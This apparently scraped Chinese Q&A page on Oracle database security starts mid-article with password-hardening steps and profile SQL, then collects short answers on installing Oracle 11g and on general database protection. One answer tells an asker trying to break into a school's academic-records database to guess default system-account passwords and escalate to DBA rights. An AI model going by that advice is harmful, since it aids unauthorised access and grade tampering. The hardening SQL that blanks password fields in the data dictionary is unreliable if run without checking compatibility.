另外，設計SID時不要使用如ORCL、TEST、PROD等常用名字，設定PORT號為遠遠大於1521的數，都可以增加黑客SID掃描的難度和時間。

5． 刪除舊版的加密口令

存放在Oracle 11g資料庫中的以前版本的加密口令是口令破解工具的一個突破口。在沒有兼容性限制的系統中，可以考慮從系統中刪除舊版口令，從而增加破解難度。

具體操作如下：

在SQLNET.ORA中增加一行：SQLNET.ALLOWED_LOGON_VERSION=11（Oracle手冊中格式介紹有錯誤，不能加括弧：…＝（11）），指定最低版本。
以SYSDBA登錄後，執行以下語句，刪除舊版口令。
update sys.user$ set password＝NULL；
delete from user_history$；
commit；

設置修改後，基於OCI的工具如SQLPLUS、10gR1和10gR2版本都可以正常登錄，而JDBC type-4 則只有11g版本才允許登錄。

提高口令強度
1．禁止使用預設口令，禁止與用戶名同名的口令，禁止字典詞彙的口令

Oracle 11g中提供一個視圖DBA_USERS_WITH_DEFPWD，可以方便地查出系統中使用預設口令的所有用戶，不足的是還有不少遺漏。讀者可以在互聯網找到預設口令的列表，雖然是非官方的，但是比DBA_USERS_WITH_DEFPWD使用的官方的列表更全。破解工具附帶的詞彙表有的包括了大型英文詞典中全部詞彙，並支持詞彙與「123」之類的常用後綴進行組合。需要注意的是，有的詞彙表中已經出現了「zhongguo」這樣的字元串，所以漢語拼音組成的口令也是不安全的。檢查系統中是否存在弱口令的最常用方法就是使用前述口令破解工具進行攻擊。

2．規定口令最小字元集和口令最短長度

口令字元集最小應包括字母、數字和特殊符號，口令長度最短應不少於8位，對於安全性要求高的系統，最短長度應為12位以上。同樣，問題的關鍵在於DBA指定初始口令以及用戶修改口令時保證不違反上述這些規定。每一用戶都對應一個Profile，如在Profile中指定口令驗證函數，則每當創建或修改口令時，會自動檢查是否滿足驗證程序中所設定的條件，如果不滿足，則口令修改失敗。對口令明文進行檢查，顯然要比對加密口令破解效率高。此外，口令創建之時進行檢查可以及時封殺弱口令，不給黑客留下破解的窗口。

指定口令驗證函數的語句為：

ALTER PROFILE DEFAULT LIMIT PASSWORD_VERIFY_FUNCTION 口令驗證函數名；

上例中，為「DEFAULT」 Profile指定了驗證函數。對用戶進行分類後，應當為每一類用戶分別創建自己的Profile，而不是全部使用DEFAULT。關閉口令驗證函數的語句為：

ALTER PROFILE DEFAULT LIMIT PASSWORD_VERIFY_FUNCTION NULL；

在$ORACLE_HOME/rdbms/admin/下，腳本文件UTLPWDMG.SQL提供了示例的口令驗證函數，執行這一腳本，將創建一名為VERIFY_FUNCTION的函數( Oracle 11g中，增加新函數verify_function_11G )。這一函數可以對口令長度是否同時出現了字母數字元號進行檢查，檢查是否與用戶名同名，也檢查口令是否是幾個最常用的詞彙，如welcome、database1、account1等。最後，口令修改時檢查新舊口令是否過於相似。讀者實際使用時應該根據系統需要對這一函數進行必要的修改和擴充。

3．使用易記憶的隨機口令限定口令長度後，如果口令沒有規律很難記憶，則用戶會採用他們自己的方式記住口令，大大增加了遭受社會工程攻擊的可能性。DBA需要幫助用戶設計一個容易記憶而又不易破解的口令。一個簡單易行的方法是找用戶非常熟悉的一個句子，如One world One dream，然後將每一個空格替換為數字或符號：One3world2One1dream#。

定期更換口令

抵禦口令破解要從多方面著手


資料庫中存在多種許可權用戶，各種授權用戶構成一棵樹

應對口令泄露或被破解的措施是強制定期更換口令，設定口令重復使用限制，規定封鎖口令的錯誤次數上限及封鎖時間。即便是加密口令落入黑客手中，在被破解之前或入侵之前，修改了口令，則口令破解變得毫無意義。為了方便記憶，一般用戶有重新使用之前過期口令的傾向，如果對重用不加控制，則定期更換口令將失去意義。上述對口令的管理仍然是通過Profile完成：

ALTER PROFILE DEFAULT LIMIT
PASSWORD_LIFE_TIME 30
PASSWORD_GRACE_TIME 7
PASSWORD_REUSE_TIME 365
PASSWORD_REUSE_MAX 0
FAILED_LOGIN_ATTEMPTS 10
PASSWORD_LOCK_TIME UNLIMITED
PASSWORD_VERIFY_FUNCTION my_verify_function;

上面語句制定的口令管理政策為：口令的有效期為30天，隨後有7天的寬限期，寬限期後口令「過期」，必須更改口令後才能登錄。只有經過365天後才能重新使用以前的口令。在連續10次輸入口令錯誤後，賬號被封鎖，設定不自動解鎖，必須由DBA手動解除封鎖。口令驗證函數為my_verify_function。

Oracle 11g以前版本，預設設置中沒有設定口令的有效期，而在Oracle 11g中預設設置有效期為180天。程序中直接寫入口令的應用在升級到11g時一定要注意有效期問題，避免半年後應用突然無法自動運行。另外，口令的有效期對SYS用戶不起作用，DBA一定要主動定期更換口令。

另外一個措施是對登錄資料庫伺服器的主機進行限定，如指定網段或指定IP地址。進一步限定客戶端允許執行的程序，如對非本地登錄禁止使用SQLPLUS，只允許執行某特定應用。

認真實施本文中給出的措施後，可以很有效地防止口令被破解。然而我們的目的是提高資料庫系統的安全性，而不僅僅是保證口令不被破解。資料庫系統安全的任何一個環節出現問題，都會導致前功盡棄。黑客的目的是入侵系統盜竊數據，是不會按常理出牌的，會嘗試各種手段方式，如社會工程、安全漏洞、物理入侵等等，而不會執著地在口令破解上與我們較勁。這一點需要我們經常提醒自己，從而切實保證資料庫系統安全。

TechTarget中國原創內容

『陸』 如何入侵學校的正方教務管理系統oracle資料庫要步驟啊

第一可以試探系統賬號的密碼例如dba,system，第二試著登陸到oracle伺服器，用伺服器的許可權獲得dba許可權

『柒』 oracle11g安裝教程完整版

在本教程中，我們將逐步介紹如何下載Oracle 11g資料庫並演示如何安裝在Windows 10 64位機器上，以便在系統中學習和實踐PL/SQL編程。下載並安裝Oracle資料庫首先，需要到Oracle官方網站下載Oracle資料庫方法如下：

1、在電腦上安裝Oracle資料庫。解壓文件得到一個database文件，雙擊setup.exe程序。

Oracle監聽器配置:

選中樹形目錄中監聽程序項，再點擊左上側「+」按鈕添加監聽程序，點擊監聽程序目錄，默認監聽器名稱是LISTENER。選中名稱，選中窗口右側欄下拉選項中的「監聽位置」，點擊添加地址按鈕。在出現網路地址欄的協議下拉選項中選中「TCP/IP」，主機文本框中輸入主機名稱或IP地址，埠文本框中輸入數字埠，也可自定義任意有效數字埠。

『捌』 資料庫安全的概念是什麼一般影響資料庫安全的因素有哪些

資料庫安全包含兩層含義：第一層是指系統運行安全，系統運行安全通常受到的威脅如下，一些網路不法分子通過網路，區域網等途徑通過入侵電腦使系統無法正常啟動，或超負荷讓機子運行大量演算法，並關閉cpu風扇，使cpu過熱燒壞等破壞性活動； 第二層是指系統信息安全，系統安全通常受到的威脅如下，黑客對資料庫入侵，並盜取想要的資料。資料庫系統的安全特性主要是針對數據而言的，包括數據獨立性、數據安全性、數據完整性、並發控制、故障恢復等幾個方面。
資料庫安全的防護技術有：資料庫加密（核心數據存儲加密）、資料庫防火牆（防漏洞、防攻擊）、數據脫敏（敏感數據匿名化）等。（來自網路）
安華金和針對於資料庫安全的防護技術全部擁護，並且在政府、金融、社保、能源、軍工、運營商、教育、醫療、企業等各行業樹立多個標桿案例。

『玖』 如何保證網路資料庫的安全

資料庫的安全性是指保護資料庫以防止非法使用所造成的數據泄密、更改或破壞安全性控制的方法安全性控制是指要盡可能地杜絕任何形式的資料庫非法訪問。常用的安全措施有用戶標識和鑒別、用戶存取許可權控制、定義視圖、數據加密、安全審計以及事務管理和故障恢復等幾類1.用戶標識和鑒別用戶標識和鑒別的方法是由系統提供一定的方式讓用戶標識自己的身份，系統內部記錄著所有合法用戶的標識，每次用戶要求進入系統時，由系統進行核實，通過鑒定後才提供其使用權。為了鑒別用戶身份，一般採用以下幾種方法（1）利用只有用戶知道的信息鑒別用戶（2）利用只有用戶具有的物品鑒別用戶（3）利用用戶的個人特徵鑒別用戶。用戶存取許可權控制用戶存取許可權是指不同的用戶對於不同的數據對象有不同的操作許可權。存取許可權由兩個要素組成：數據對象和操作類型。定義一個用戶的存取許可權就是要定義這個用戶可以在哪些數據對象上進行哪些類型的操作許可權分系統許可權和對象許可權兩種。系統許可權由DBA授予某些資料庫用戶，只有得到系統許可權，才能成為資料庫用戶。對象許可權是授予資料庫用戶對某些數據對象進行某些操作的許可權，它既可由DBA授權，也可由數據對象的創建者授予。授權定義經過編譯後以一張授權表的形式存放在數據字典中。定義視圖為不同的用戶定義不同的視圖，可以限制用戶的訪問范圍。通過視圖機制把需要保密的數據對無權存取這些數據的用戶隱藏起來，可以對資料庫提供一定程度的安全保護。實際應用中常將視圖機制與授權機制結合起來使用，首先用視圖機制屏蔽一部分保密數據，然後在視圖上進一步進行授權。數據加密數據加密是保護數據在存儲和傳遞過程中不被竊取或修改的有效手段。數據加密技術在8.3節中已有詳細介紹。安全審計安全審計是一種監視措施，對於某些高度敏感的保密數據，系統跟蹤記錄有關這些數據的訪問活動，並將跟蹤的結果記錄在審計日誌（audit log）中，根據審計日誌記錄可對潛在的竊密企圖進行事後分析和調查6.事務管理和故障恢復事務管理和故障恢復主要是對付系統內發生的自然因素故障，保證數據和事務的一致性和完整性故障恢復的主要措施是進行日誌記錄和數據復制。在網路資料庫系統中，分布事務首先要分解為多個子事務到各個站點上去執行，各個伺服器之間還必須採取合理的演算法進行分布式並發控制和提交，以保證事務的完整性。事務運行的每一步結果都記錄在系統日誌文件中，並且對重要數據進行復制，發生故障時根據日誌文件利用數據副本准確地完成事務的恢復Oracle資料庫的安全機制簡介Oracle主要提供用戶標識和鑒別、授權與檢查、審計等系統級的安全性措施以及通過觸發器靈活定義的用戶級安全性措施1.Oracle的用戶標識和鑒別Oracle系統預定義了SYS和SYSTEM兩個用戶。SYS用戶擁有操作Oracle數據字典和相關的資料庫對象的許可權；SYSTEM用戶擁有操作Oracle應用開發工具所使用的表的許可權。SYS和SYSTEM用戶分別用系統給定的口令登錄。其他用戶使用CREATE USER語句建立，同時用戶的口令通過加密後存儲在數據字典中。Oracle的授權與檢查機制Oracle系統的許可權包括系統許可權和對象許可權兩類，採用非集中式的授權機制，即DBA負責授予與回收系統許可權，每個用戶授予與回收自己創建的資料庫對象的許可權Oracle也是將授權信息記錄在數據字典的授權表中。Oracle的審計技術在Oracle中，審計分為語句審計、特權審計和模式對象審計。其中，語句審計只允許審計SQL語句，不對SQL語句引用的模式進行審計。特權審計只審計系統許可權的使用。而模式對象審計則審計具體的數據操縱語言（DML，Data Manipulation Language）語句和制定模式的GRANT和REVOKE語句。特權審計和模式對象審計針對所有用戶，通常由DBA設置在Oracle中，審計設置以及審計內容均存放在數據字典中。用戶定義的安全性措施除了系統級的安全性措施外，Oracle還允許用戶使用資料庫觸發器定義更復雜的用戶級安全性措施。觸發器定義後，也存放在數據字典中。用戶每次執行特定的操作時都會自動觸發對應的觸發器，系統檢查觸發器中設定的執行條件是否符合，如不符合則不執行觸發器中指定的操作綜上所述，Oracle提供了多種安全性措施，提供了多級安全性檢查。數據字典在Oracle的安全性授權和檢查以及審計技術中起著重要作用。網路資料庫安全性技術 隨著互聯網技術的日益普及，網路資料庫已經得到了普遍應用，隨之而來的則是網路資料庫的安全性問題。特別是近幾年，隨著企業信息建設的不斷深化，企業中涉及網路資料庫安全方面的問題也越來越多。如何有效提高網路資料庫的安全防禦措施，建立一套行之有效的資料庫安全防禦機制，已經是企業需要首先解決的問題。網路資料庫安全問題經常涉及到的是資料庫數據的丟、非法用戶對資料庫的侵入等。針對以上兩個方面的問題，應該採取具體的應對措施，以實現企業核心數據的安全防護。首先，針對網路資料庫數據丟失的問題，應該著重以下幾個方面的工作：1、伺服器存儲系統硬碟作為伺服器數據存儲的主要設備，在正常運行過程中，一點小的故障都有可能造成硬碟物理損壞，所以一般伺服器存儲系統要求採用 Raid磁碟陣列，以此來增強伺服器存儲系統的容錯能力。2、數據備份機制建立一套行之有效的數據備份機制，是保障企業網路數據安全的又一項重要內容。對於一些非常重要的數據要運用其它設備時時執行 備份，定期定時做相對完備的備份方案。作為企業用戶來說，由於數據量上的原因，在使用磁碟陣列的同時，還應考慮採用磁帶機作為數據備份設備。在解決好數據丟失問題的基礎上，需要考慮的則是如何應對網路資料庫非法入侵的問題。網路技術的飛速發展，使各行業的信息化管理水平有了很大程度的提高，同時也帶動了整個企業的管理效率的提高，但隨之而來的問題是網路非法入侵者不斷出現。入侵者的目的往往針對企業核心機密，或是對數據的蓄意破壞。對於企業網路資料庫管理人員來說，如何在資料庫本身以及在網路層面上採取有效措施，防止資料庫系統的非法入侵，是一個非常艱巨的任務。制定資料庫系統安全策略，主要分以下幾個方面：1.資料庫用戶的管理，按照資料庫系統的大小和資料庫用戶所需的工作量，具體分配資料庫用戶的數據操作許可權，控制系統管理員用戶賬號的使用。2.建立行之有效的資料庫用戶身份確認策略，資料庫用戶可以通過操作系統、網路服務以及資料庫系統進行身份確認，通過主機操作系統進行用戶身份認證。 3.加強操作系統安全性管理，數據伺服器操作系統必須使用正版軟體，同時要有防火牆的保護。另外，根據實際需要只開放涉及業務工作的具體網路埠，屏蔽其它埠，這樣可以在較大程度上防止操作系統受入侵。

『拾』 關於入侵教務[正方教務系統][URP教務系統][青果教務系統][強智教務系統] 等系列的ORACLE 資料庫教務系統

那是你們教務系統做的不完善，沒有操作日誌，一般系統都會有的；這個日誌會記錄資料庫所有操作，包括你說的改成績，它都會有變化日誌